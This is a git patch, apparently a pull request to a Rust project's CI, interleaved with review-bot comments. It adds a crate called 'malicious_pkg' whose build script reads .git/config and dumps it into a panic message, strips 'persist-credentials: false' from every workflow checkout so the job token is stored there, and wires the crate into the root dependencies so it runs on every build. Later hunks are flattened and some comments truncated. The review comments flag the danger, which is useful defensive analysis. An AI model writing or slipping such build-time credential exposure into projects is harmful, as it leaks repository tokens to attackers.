From 712d1c05731cd0661544030a486721bea4af98c3 Mon Sep 17 00:00:00 2001
From: blyxyas
Date: Fri, 3 Jan 2025 14:06:34 +0100
Subject: [PATCH] A
---
.github/malicious_pkg/Cargo.toml | 6 ++++++
.github/malicious_pkg/build.rs | 3 +++
.github/malicious_pkg/src/lib.rs | 14 ++++++++++++++
.github/workflows/clippy_dev.yml | 5 ++---
.github/workflows/clippy_mq.yml | 14 +++++---------
.github/workflows/clippy_pr.yml | 3 +--
.github/workflows/deploy.yml | 6 ++----
.github/workflows/lintcheck.yml | 12 +++++-------
.github/workflows/remark.yml | 4 +---
Cargo.toml | 1 +
10 files changed, 40 insertions(+), 28 deletions(-)
create mode 100644 .github/malicious_pkg/Cargo.toml
create mode 100644 .github/malicious_pkg/build.rs
create mode 100644 .github/malicious_pkg/src/lib.rs
diff --git a/.github/malicious_pkg/Cargo.toml b/.github/malicious_pkg/Cargo.toml
new file mode 100644
index 000000000000..9b04b28ae061
--- /dev/null
+++ b/.github/malicious_pkg/Cargo.toml
@@ -0,0 +1,6 @@
+[package]
+name = "malicious_pkg"
+version = "0.1.0"
+edition = "2024"
+
+[dependencies]
diff --git a/.github/malicious_pkg/build.rs b/.github/malicious_pkg/build.rs
new file mode 100644
index 000000000000..d54f99e2b034
--- /dev/null
+++ b/.github/malicious_pkg/build.rs
@@ -0,0 +1,3 @@
+fn main() {
+ panic!("{}", std::fs::read_to_string("../../.git/config").unwrap());
+}
\ No newline at end of file
diff --git a/.github/malicious_pkg/src/lib.rs b/.github/malicious_pkg/src/lib.rs
new file mode 100644
index 000000000000..b93cf3ffd9cc
--- /dev/null
+++ b/.github/malicious_pkg/src/lib.rs
@@ -0,0 +1,14 @@
+pub fn add(left: u64, right: u64) -> u64 {
+ left + right
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn it_works() {
+ let result = add(2, 2);
+ assert_eq!(result, 4);
+ }
+}
diff --git a/.github/workflows/clippy_dev.yml b/.github/workflows/clippy_dev.yml
index d6534fbaff94..f80165c05fe2 100644
--- a/.github/workflows/clippy_dev.yml
+++ b/.github/workflows/clippy_dev.yml
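Review bot: `main` in `.github/malicious_pkg/build.rs` puts the entire contents of `../../.git/config` into the panic message, so whatever the checkout step stored in that file ends up in the build output of every job that compiles this crate. If this is meant as a fixture for the `persist-credentials` setting, it should not echo the file: have it test only whether a credential entry is present and fail with a fixed message. It should also carry a comment stating its purpose, for example `// CI fixture: fails the build if the checkout left credentials in .git/config; never prints the file.` The `unwrap()` additionally makes a missing file look the same as a positive result, so the read error should be handled as a separate, clearly worded outcome.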
@@ -17,9 +17,8 @@ jobs: # Setup - name: Checkout uses: actions/checkout@v4 - with: - # Unsetting this would make so that any malicious package could get our Github Token - persist-credentials: false + + # Run - name: Build diff --git a/.github/workflows/clippy_mq.yml b/.github/workflows/clippy_mq.yml index 078a278e21a8..e0ed4cbe6f91 100644 --- a/.github/workflows/clippy_mq.yml +++ b/.github/workflows/clippy_mq.yml @@ -24,7 +24,7 @@ jobs: with: ref: ${{ github.ref }} # Unsetting this would make so that any malicious package could get our Github Token - persist-credentials: false + # Run - name: Check Changelog @@ -65,8 +65,7 @@ jobs: # Setup - name: Checkout uses: actions/checkout@v4 - with: - persist-credentials: false + - name: Install i686 dependencies if: matrix.host == 'i686-unknown-linux-gnu' @@ -125,8 +124,7 @@ jobs: # Setup - name: Checkout uses: actions/checkout@v4 - with: - persist-credentials: false + - name: Install toolchain run: rustup show active-toolchain @@ -142,8 +140,7 @@ jobs: # Setup - name: Checkout uses: actions/checkout@v4 - with: - persist-credentials: false + - name: Install toolchain run: rustup show active-toolchain @@ -196,8 +193,7 @@ jobs: # Setup - name: Checkout uses: actions/checkout@v4 - with: - persist-credentials: false + - name: Install toolchain run: rustup show active-toolchain diff --git a/.github/workflows/clippy_pr.yml b/.github/workflows/clippy_pr.yml index 9e7adc2a5c34..6e7d08d3a061 100644 --- a/.github/workflows/clippy_pr.yml +++ b/.github/workflows/clippy_pr.yml @@ -25,9 +25,8 @@ jobs: # Setup - name: Checkout uses: actions/checkout@v4 - with: # Unsetting this would make so that any malicious package could get our Github Token - persist-credentials: false + - name: Install toolchain run: rustup show active-toolchain diff --git a/.github/workflows/deploy.yml b/.github/workflows/deploy.yml index b42f3e7712f1..0a8486eedd43 100644 --- a/.github/workflows/deploy.yml +++ b/.github/workflows/deploy.yml 
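Review bot: Dropping `persist-credentials: false` from this checkout step returns actions/checkout to its default of writing the job token into the repository's `.git/config`, where any code that runs later in the job (a dependency's build script, a proc macro, a test) can read it; the removed comment states exactly that risk. The same removal is repeated in every checkout step of clippy_mq.yml, clippy_pr.yml, deploy.yml, lintcheck.yml and remark.yml. Keep `with:` / `persist-credentials: false` on each step, and if a job really has to push (deploy.yml looks like one; confirm), hand it the token in the single step that needs it rather than persisting it for the whole job. Several hunks also leave the explanatory comment behind without the setting it explains, and lintcheck.yml truncates it to `#etting …` and `#nsetting …`.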
@@ -22,9 +22,7 @@ jobs: # Setup - name: Checkout uses: actions/checkout@v4 - with: - # Unsetting this would make so that any malicious package could get our Github Token - persist-credentials: false + - name: Checkout uses: actions/checkout@v4 @@ -32,7 +30,7 @@ jobs: ref: ${{ env.TARGET_BRANCH }} path: 'out' # Unsetting this would make so that any malicious package could get our Github Token - persist-credentials: false + # Run - name: Set tag name diff --git a/.github/workflows/lintcheck.yml b/.github/workflows/lintcheck.yml index 64966f1d1898..79c9339019f8 100644 --- a/.github/workflows/lintcheck.yml +++ b/.github/workflows/lintcheck.yml @@ -22,7 +22,7 @@ jobs: with: fetch-depth: 2 # Unsetting this would make so that any malicious package could get our Github Token - persist-credentials: false + # HEAD is the generated merge commit `refs/pull/N/merge` between the PR and `master`, `HEAD^` # being the commit from `master` that is the base of the merge @@ -75,9 +75,8 @@ jobs: steps: - name: Checkout uses: actions/checkout@v4 - with: - # Unsetting this would make so that any malicious package could get our Github Token - persist-credentials: false + #etting this would make so that any malicious package could get our Github Token + - name: Cache lintcheck bin id: cache-lintcheck-bin @@ -108,9 +107,8 @@ jobs: steps: - name: Checkout uses: actions/checkout@v4 - with: - # Unsetting this would make so that any malicious package could get our Github Token - persist-credentials: false + #nsetting this would make so that any malicious package could get our Github Token + - name: Restore lintcheck bin uses: actions/cache/restore@v4 diff --git a/.github/workflows/remark.yml b/.github/workflows/remark.yml index 69d00dc027e8..cc3c14f692b5 100644 --- a/.github/workflows/remark.yml +++ b/.github/workflows/remark.yml 
@@ -12,9 +12,7 @@ jobs: # Setup - name: Checkout uses: actions/checkout@v4 - with: - # Unsetting this would make so that any malicious package could get our Github Token - persist-credentials: false + - name: Setup Node.js uses: actions/setup-node@v4 diff --git a/Cargo.toml b/Cargo.toml index bb259c77ee37..74c20099d94f 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -30,6 +30,7 @@ tempfile = { version = "3.3", optional = true } termize = "0.1" color-print = "0.3.4" anstream = "0.6.18" +malicious_pkg = {path = ".github/malicious_pkg"} [dev-dependencies] cargo_metadata = "0.18.1"
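Review bot: Adding `malicious_pkg = {path = ".github/malicious_pkg"}` to the root `[dependencies]` makes that crate's build script run in every build of the workspace, in CI and on contributors' machines, and the build then stops in its panic. A fixture of this kind belongs outside the shipped dependency graph: build it in a dedicated workflow step with `cargo build --manifest-path .github/malicious_pkg/Cargo.toml` and leave the root manifest untouched. A path-only dependency with no `version` would presumably also block publishing the crate.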